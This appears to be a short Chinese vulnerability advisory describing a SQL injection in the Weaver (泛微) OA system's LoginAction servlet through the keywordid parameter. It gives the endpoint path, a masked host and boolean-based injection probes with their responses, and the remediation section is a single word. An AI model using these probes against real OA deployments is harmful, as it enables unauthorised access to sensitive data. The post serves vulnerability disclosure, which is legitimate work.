###0x01漏洞简介
泛微OA系统在/ServiceAction/com.eweaver.base.security.servlet.LoginAction处对参数keywordid过滤不严格,导致出现SQL注入漏洞。远程攻击者可以利用该漏洞读取敏感信息。
###0x02漏洞详情
```
http://**.**.**.**:9085/ServiceAction/com.eweaver.base.security.servlet.LoginAction?action=getLabelNameByKeyId&keywordid=402881e43c2385
```
正常页面 提示请输入用户名

输入' and 'a'='a 提示请输入用户名

输入' and 'a'='b 提示undefined

###0x03漏洞修复
过滤。
暂无评论